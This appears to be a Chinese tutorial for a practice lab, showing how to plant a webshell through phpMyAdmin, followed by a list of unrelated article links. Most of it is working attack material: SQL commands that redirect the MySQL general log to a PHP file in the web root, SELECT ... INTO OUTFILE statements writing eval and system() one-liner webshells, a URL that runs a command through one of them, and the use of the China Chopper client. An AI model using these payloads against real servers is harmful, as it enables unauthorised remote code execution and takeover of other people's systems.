phpMyAdmin之CMS靶场

方法一:通过日志文件拿webshell

常用的语句如下:

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';
select+'<?php+phpinfo();+?>'
select+'<?php+//%0Aphpinfo();+?>'

查看日志目录路径

复制代码
show global variables like '%general%';

打开日志功能

复制代码
set global general_log='on'; 

设置日志文件目录,创建php日志文件

复制代码
set global general_log_file='D:/phpStudy_pro/WWW/muma.php';

查看自己创建的日志文件

复制代码
show global variables like '%general%';

往日志文件里写一句话木马

复制代码
select '<?php eval($_POST["admin"]);?>';

使用中国菜刀工具连接自己创建的php文件。

链接到了服务器的目录

懒人方法:也可以直接全部运行

复制代码
show global variables like '%general%';
set global general_log='on'; 
set global general_log_file = 'D:/phpStudy_pro/WWW/muma.php';
show global variables like '%general%';
select '<?php eval($_POST["admin"]);?>';

方法二:上传日志文件拿shell

常用语句

复制代码
1.⾸先判断mysql位置
select @@datadir
路径:C:\phpStudy\MySQL\data\
2.猜测web路径
猜测web路径:C:\phpStudy\www
C:\phpStudy\WWW\web.php
3.写webshell
select "<?php eval($_POST[a]);?>" into outfile 'c:/phpstudy/www/b.php';
select "<?php system($_GET[a]);?>" into outfile 'c:/phpstudy/PHPTutorial/w
ww/d.php';
4.浏览器
http://192.168.2.8/d.php?a=dir ..\
select "<?php phpinfo();eval($_POST[a]);?>" into outfile 'C:\phpStudy\WWW
\web.php';
备注:/
不要⽤\,如⾥要⽤\\(转义)
相关推荐
xywww1683 小时前
大模型 API 选型实战:GPT、Gemini、Claude 接入时该看哪些指标?
运维·服务器·人工智能·python·gpt·langchain
欢呼的太阳7 小时前
数据库设计Step by Step (10)——范式化
服务器·数据库·oracle
sdghterhd8 小时前
WebSocket 快速入门教程(附示例源码)
网络·websocket·网络协议
夜雪一千8 小时前
Python enumerate() 函数完整详解:遍历同时获取索引,告别手动计数
服务器·windows·python
xy34538 小时前
Wireshark捕获过滤器——语法元素详解
网络·测试工具·渗透测试·wireshark
DLYSB_9 小时前
生命通道:如何用 HIS 医疗系统直连网络声光终端,打造“零延误”的危急值响应网关?
java·网络·数据库·报警灯
大E帝国子民110 小时前
MacOS 安装Seismic Unix
服务器·macos·unix
德福危险10 小时前
富有想象力的XSS盲打:靶机练习之Tempus_fugit5
服务器·网络·xss
哥是强混11 小时前
Means:基于 .NET 10 打造的开源自部署 S3 兼容对象存储服务
网络·数据库·.net
Piko61412 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记